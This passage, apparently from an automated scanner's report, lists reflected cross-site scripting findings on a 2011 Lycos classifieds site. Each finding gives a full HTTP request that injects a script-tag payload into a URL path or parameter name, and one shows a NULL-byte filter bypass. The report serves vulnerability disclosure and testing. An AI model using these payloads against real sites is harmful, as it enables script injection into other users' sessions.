Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146%00434ac"><script>alert(1)</script>f0b202c5c34?mobile=1" rel="nofollow">
...[SNIP]...

1.116. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c37"><script>alert(1)</script>4e3fb0da995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:48 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/
Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?34c37"><script>alert(1)</script>4e3fb0da995=1&mobile=1" rel="nofollow">
...[SNIP]...

1.117. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6bb"><script>alert(1)</script>fff7f43fb3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniturecc6bb"><script>alert(1)</script>fff7f43fb3b/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?mobile=1" rel="nofollow">
...[SNIP]...

1.118. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d2aae"><script>alert(1)</script>bc97f7c991a was submitted in the REST URL parameter 2. This input was echoed as d2aae"><script>alert(1)</script>bc97f7c991a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818%00d2aae"><script>alert(1)</script>bc97f7c991a?mobile=1" rel="nofollow">
...[SNIP]...

1.119. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea7f"><script>alert(1)</script>c58e7734110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:53 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture; path=/
Set-Cookie: classifieds[lastpage][0][name]=Furniture; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818?5ea7f"><script>alert(1)</script>c58e7734110=1&mobile=1" rel="nofollow">
...[SNIP]...

1.120. http://classifieds.lycos.com/sale-home-appliance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-home-appliance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d9c"><script>alert(1)</script>ed769d5666e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:41 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-home-appliance62d9c"><script>alert(1)</script>ed769d5666e/?mobile=1" rel="nofollow">
...[SNIP]...

1.121. http://classifieds.lycos.com/sale-home-appliance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-home-appliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c2b"><script>alert(1)</script>2a3be374949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-home-appliance/?d4c2b"><script>alert(1)</script>2a3be374949=1&mobile=1" rel="nofollow">
...[SNIP]...

1.122. http://classifieds.lycos.com/sale-kid/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-kid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee25"><script>alert(1)</script>d5547f0ba09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-kid3ee25"><script>alert(1)</script>d5547f0ba09/?mobile=1" rel="nofollow">
...[SNIP]...

1.123. http://classifieds.lycos.com/sale-kid/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-kid/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddce"><script>alert(1)</script>47aa7265f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-kid/?bddce"><script>alert(1)</script>47aa7265f70=1&mobile=1" rel="nofollow">
...[SNIP]...

1.124. http://classifieds.lycos.com/sale-music/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-music/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c58d"><script>alert(1)</script>c5b4c6e40fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-music1c58d"><script>alert(1)</script>c5b4c6e40fe/?mobile=1" rel="nofollow">
...[SNIP]...

1.125. http://classifieds.lycos.com/sale-music/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-music/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd98"><script>alert(1)</script>6781372f1a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-music/?3cd98"><script>alert(1)</script>6781372f1a2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.126. http://classifieds.lycos.com/sale-pet-bird/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-bird/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcb3"><script>alert(1)</script>447ff4bb05b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/?mobile=1" rel="nofollow">
...[SNIP]...

1.127. http://classifieds.lycos.com/sale-pet-bird/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-bird/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff4"><script>alert(1)</script>97fa90e91b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.128. http://classifieds.lycos.com/sale-pet-cat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-cat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab5a"><script>alert(1)</script>9510e6a4e28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/?mobile=1" rel="nofollow">
...[SNIP]...

1.129. http://classifieds.lycos.com/sale-pet-cat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-cat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae787"><script>alert(1)</script>ab025033532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45645

